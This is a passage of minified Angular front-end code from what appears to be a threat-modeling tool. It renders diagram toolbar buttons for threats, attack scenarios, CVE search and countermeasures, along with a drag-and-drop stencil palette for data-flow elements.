iagram.fs.textSmaller")),C(9),V("checked",2==i.Dia.FontSizeConfigIndex),C(1),ke(re(107,137,"pages.modeling.diagram.fs.textSmall")),C(9),V("checked",3==i.Dia.FontSizeConfigIndex),C(1),ke(re(117,139,"pages.modeling.diagram.fs.textNormal")),C(9),V("checked",4==i.Dia.FontSizeConfigIndex),C(1),ke(re(127,141,"pages.modeling.diagram.fs.textLarge")),C(9),V("checked",5==i.Dia.FontSizeConfigIndex),C(1),ke(re(137,143,"pages.modeling.diagram.fs.textLarger")),C(6),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(147,145,"pages.modeling.diagram.sendBack")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(4),at("matTooltip",re(164,147,"pages.modeling.diagram.sendBackwards")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(4),at("matTooltip",re(177,149,"pages.modeling.diagram.bringForward")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(4),at("matTooltip",re(190,151,"pages.modeling.diagram.bringFront")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(4),at("matTooltip",re(207,153,"pages.modeling.diagram.annotation")),V("disabled","pan"==i.Dia.MouseMode),C(8),at("matTooltip",re(215,155,"pages.modeling.diagram.findUninitObject")),V("disabled",0==i.Dia.ObjectCountToInit.length),C(3),V("matBadge",i.Dia.ObjectCountToInit)("matBadgeHidden",0==i.Dia.ObjectCountToInit.length),C(4),at("matTooltip",re(222,157,"pages.modeling.diagram.suggestedThreats")),V("disabled",i.IsContextDiagram||!i.selectedElement),C(7),at("matTooltip",re(229,159,"pages.modeling.diagram.addAttackScenario")),V("disabled",!i.selectedElement),C(7),at("matTooltip",re(236,161,"pages.modeling.diagram.CveSearch")),V("disabled",!i.selectedElement),C(6),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),C(5),V("ngIf",i.dataService.Project.HasTesting),C(2),at("matTooltip",re(251,163,"pages.modeling.diagram.addCountermeasure")),V("disabled",!i.selectedElement),C(7),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(260,165,"pages.modeling.diagram.ThreatGenerationSettings")),V("matMenuTriggerFor",c),C(12),V("ngModel",i.diagram.Settings.GenerationThreatLibrary),C(1),ct("\n          ",re(273,167,"pages.modeling.diagram.ThreatLibrary"),"\n        "),C(4),V("ngIf",i.HasMnemonics),C(2),V("disabled",!i.HasThreatRuleGroups)("matMenuTriggerFor",d),C(1),ke(re(280,169,"pages.modeling.diagram.ThreatRuleGroups")),C(5),V("ngModel",i.diagram.Settings.GenerationAssetBased),C(1),ct("\n          ",re(286,171,"pages.modeling.diagram.AssetBasedGeneration"),"\n        "),C(7),V("ngForOf",i.dataService.Config.GetStencilThreatMnemonics()),C(6),V("ngForOf",i.GetThreatRuleGroups()),C(5),V("value",i.Zoom),C(30),V("ngIf",!kr(175,glt).includes(i.Zoom)),C(3),at("matTooltip",re(337,173,"pages.modeling.diagram.fitSceen")),C(14),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",T)}},dependencies:[Zi,Ri,pm,_m,Ta,Ea,tH,NMe,oa,Hh,da,_p,Xo,qo,po,Zc,Pa,vg,sV,cV,bP,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.my-canvas[_ngcontent-%COMP%]{height:calc(100% - 32px)}",".heavy[_ngcontent-%COMP%] {\n          font: bold 10px sans-serif;\n        }"]}),t})();function ylt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n      \n      ",re(17,4,"pages.modeling.stencilpalettte.cs.info"),"\n    "))}function blt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.oi.info"),"\n    "))}function Mlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.uc.infoNoReferences"),"\n    "))}function vlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.dt.info"),"\n    "))}function Alt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.a.info"),"\n    "))}function Tlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.swp.info"),"\n    "))}function Elt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function Dlt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function xlt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function wlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",9),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,Dlt,2,3,"tspan",12),s(12,"\n              "),ne(13,xlt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Ilt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),m(1,"div",16),s(2),u()()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function Rlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          External Entity\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"cloud"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),m(14,"div",3),s(15,"\n        "),ne(16,Ilt,3,4,"div",4),s(17,"\n      "),u(),s(18,"\n    "),u()),2&t){const e=B(2);C(16),V("ngForOf",e.ExternalEntityStencils)}}function Slt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",17),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function klt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(3);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Plt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(3);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Olt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",18),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,klt,2,3,"tspan",12),s(12,"\n              "),ne(13,Plt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Nlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          Interface\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),s(14,"\n      "),m(15,"div",3),s(16,"\n        "),ne(17,Olt,17,8,"div",4),s(18,"\n      "),u(),s(19,"\n    "),u()),2&t){const e=B(2);C(17),V("ngForOf",e.InterfaceStencils)}}function Llt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",i.theme.Accent),C(1),ke(e.name)}}function zlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          Interface\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),m(14,"div",3),s(15,"\n        "),ne(16,Llt,3,4,"div",4),s(17,"\n      "),u(),s(18,"\n    "),u()),2&t){const e=B(2);C(16),V("ngForOf",e.InterfaceStencils)}}function Wlt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Flt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Vlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",19),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,Wlt,2,3,"tspan",12),s(12,"\n              "),ne(13,Flt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Blt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",i.theme.Accent),C(1),ke(e.name)}}function Hlt(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Process\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"memory"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n\n      "),m(16,"div",3),s(17,"\n        "),ne(18,Elt,3,4,"div",4),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n\n    "),m(22,"mat-expansion-panel",2),s(23,"\n      "),m(24,"mat-expansion-panel-header"),s(25,"\n        "),m(26,"mat-panel-title"),s(27,"\n          Data Store\n        "),u(),s(28,"\n        "),m(29,"mat-panel-description"),s(30,"\n          "),m(31,"mat-icon"),s(32,"sd_card"),u(),s(33,"\n        "),u(),s(34,"\n      "),u(),s(35,"\n\n      "),m(36,"div",3),s(37,"\n        "),ne(38,wlt,17,8,"div",4),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n\n    "),ne(42,Rlt,19,1,"mat-expansion-panel",5),s(43,"\n    "),s(44,"\n    "),m(45,"mat-expansion-panel",2),s(46,"\n      "),m(47,"mat-expansion-panel-header"),s(48,"\n        "),m(49,"mat-panel-title"),s(50,"\n          Trust Area\n        "),u(),s(51,"\n        "),m(52,"mat-panel-description"),s(53,"\n          "),m(54,"mat-icon"),s(55,"select_all"),u(),s(56,"\n        "),u(),s(57,"\n      "),u(),s(58,"\n\n      "),m(59,"div",3),s(60,"\n        "),ne(61,Slt,3,4,"div",4),s(62,"\n      "),u(),s(63,"\n    "),u(),s(64,"\n\n    "),ne(65,Nlt,20,1,"mat-expansion-panel",5),s(66,"\n    "),ne(67,zlt,19,1,"mat-expansion-panel",5),s(68,"\n\n    "),m(69,"mat-expansion-panel",2),s(70,"\n      "),m(71,"mat-expansion-panel-header"),s(72,"\n        "),m(73,"mat-panel-title"),s(74,"\n          Physical Link\n        "),u(),s(75,"\n        "),m(76,"mat-panel-description"),s(77,"\n          "),m(78,"mat-icon"),s(79,"precision_manufacturing"),u(),s(80,"\n        "),u(),s(81,"\n      "),u(),s(82,"\n\n      "),s(83,"\n      "),m(84,"div",3),s(85,"\n        "),ne(86,Vlt,17,8,"div",4),s(87,"\n      "),u(),s(88,"\n    "),u(),s(89,"\n\n    "),m(90,"mat-expansion-panel",2),s(91,"\n      "),m(92,"mat-expansion-panel-header"),s(93,"\n        "),m(94,"mat-panel-title"),s(95,"\n          Template\n        "),u(),s(96,"\n        "),m(97,"mat-panel-description"),s(98,"\n          "),m(99,"mat-icon"),s(100,"view_module"),u(),s(101,"\n        "),u(),s(102,"\n      "),u(),s(103,"\n\n      "),m(104,"div",3),s(105,"\n        "),ne(106,Blt,3,4,"div",4),s(107,"\n      "),u(),s(108,"\n    "),u(),s(109,"\n  "),Mt()),2&t){const e=B();C(18),V("ngForOf",e.ProcessStencils),C(20),V("ngForOf",e.DataStoreStencils),C(4),V("ngIf","dataflow"==e.NodeType),C(19),V("ngForOf",e.TrustAreaStencils),C(4),V("ngIf","hardware"==e.NodeType),C(2),V("ngIf","dataflow"==e.NodeType),C(19),V("ngForOf",e.PhysicalLinkStencils),C(20),V("ngForOf",e.StencilTemplates)}}function Ult(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragComponent(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(2),ke(e.Name)}}function qlt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Component\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"code"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n\n      "),m(16,"div",3),s(17,"\n        "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragComponent(n))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(19,"div",7),s(20,"New Component"),u()(),s(21,"\n        "),ne(22,Ult,3,2,"div",21),s(23,"\n      "),u(),s(24,"\n\n    "),u(),s(25,"\n  "),Mt()}if(2&t){const e=B();C(22),V("ngForOf",e.ComponentTypes)}}function Glt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Device\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"developer_board"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n  \n      "),m(16,"div",3),s(17,"\n        "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Device",type:"1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(19,"\n          "),m(20,"div",16),s(21,"Device"),u(),s(22,"\n        "),u(),s(23,"\n        "),m(24,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Device",type:"2"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(25,"\n          "),m(26,"div",16),s(27,"\n            "),m(28,"div",22),s(29,"Device"),u(),s(30,"\n          "),u(),s(31,"\n        "),u(),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n\n    "),m(35,"mat-expansion-panel",2),s(36,"\n      "),m(37,"mat-expansion-panel-header"),s(38,"\n        "),m(39,"mat-panel-title"),s(40,"\n          App\n        "),u(),s(41,"\n        "),m(42,"mat-panel-description"),s(43,"\n          "),m(44,"mat-icon"),s(45,"widgets"),u(),s(46,"\n        "),u(),s(47,"\n      "),u(),s(48,"\n  \n      "),m(49,"div",3),s(50,"\n        "),m(51,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"App",type:"1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(52,"\n          "),m(53,"div",16),s(54,"App"),u(),s(55,"\n        "),u(),s(56,"\n        "),m(57,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"App",type:"2"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(58,"\n          "),m(59,"div",16),s(60,"\n            "),m(61,"div",22),s(62,"App"),u(),s(63,"\n          "),u(),s(64,"\n        "),u(),s(65,"\n      "),u(),s(66,"\n    "),u(),s(67,"\n\n    "),m(68,"mat-expansion-panel",2),s(69,"\n      "),m(70,"mat-expansion-panel-header"),s(71,"\n        "),m(72,"mat-panel-title"),s(73,"\n          Actor\n        "),u(),s(74,"\n        "),m(75,"mat-panel-description"),s(76,"\n          "),m(77,"mat-icon"),s(78,"people"),u(),s(79,"\n        "),u(),s(80,"\n      "),u(),s(81,"\n  \n      "),m(82,"div",3),s(83,"\n        "),m(84,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Interactor"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(85,"\n          "),fi(),m(86,"svg",8),s(87,"\n            "),it(88,"circle",23),s(89,"\n            "),it(90,"path",24),s(91,"\n            "),m(92,"text",10),s(93,"\n              "),m(94,"tspan",25),s(95,"Actor"),u(),s(96,"\n            "),u(),s(97,"\n          "),u(),s(98,"\n        "),u(),s(99,"\n      "),u(),s(100,"\n    "),u(),s(101,"\n\n    "),ln(),m(102,"mat-expansion-panel",2),s(103,"\n      "),m(104,"mat-expansion-panel-header"),s(105,"\n        "),m(106,"mat-panel-title"),s(107,"\n          Interface\n        "),u(),s(108,"\n        "),m(109,"mat-panel-description"),s(110,"\n          "),m(111,"mat-icon"),s(112,"sync_alt"),u(),s(113,"\n        "),u(),s(114,"\n      "),u(),s(115,"\n  \n      "),m(116,"div",3),s(117,"\n        "),m(118,"div",26),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Interface1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(119,"\n          "),m(120,"div"),s(121,"\n            Interface\n          "),u(),s(122,"\n          "),m(123,"div",27),s(124,"\n          "),u(),s(125,"\n        "),u(),s(126,"\n        "),s(127,"\n      "),u(),s(128,"\n    "),u(),s(129,"\n\n    "),m(130,"mat-expansion-panel",2),s(131,"\n      "),m(132,"mat-expansion-panel-header"),s(133,"\n        "),m(134,"mat-panel-title"),s(135,"\n          External Entity\n        "),u(),s(136,"\n        "),m(137,"mat-panel-description"),s(138,"\n          "),m(139,"mat-icon"),s(140,"cloud"),u(),s(141,"\n        "),u(),s(142,"\n      "),u(),s(143,"\n\n      "),m(144,"div",3),s(145,"\n        "),m(146,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"External Entity"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(147,"div",16),s(148,"External Entity"),u()(),s(149,"\n      "),u(),s(150,"\n    "),u(),s(151,"\n    "),m(152,"mat-expansion-panel",2),s(153,"\n      "),m(154,"mat-expansion-panel-header"),s(155,"\n        "),m(156,"mat-panel-title"),s(157,"\n          Trust Area\n        "),u(),s(158,"\n        "),m(159,"mat-panel-description"),s(160,"\n          "),m(161,"mat-icon"),s(162,"select_all"),u(),s(163,"\n        "),u(),s(164,"\n      "),u(),s(165,"\n\n      "),m(166,"div",3),s(167,"\n        "),m(168,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return 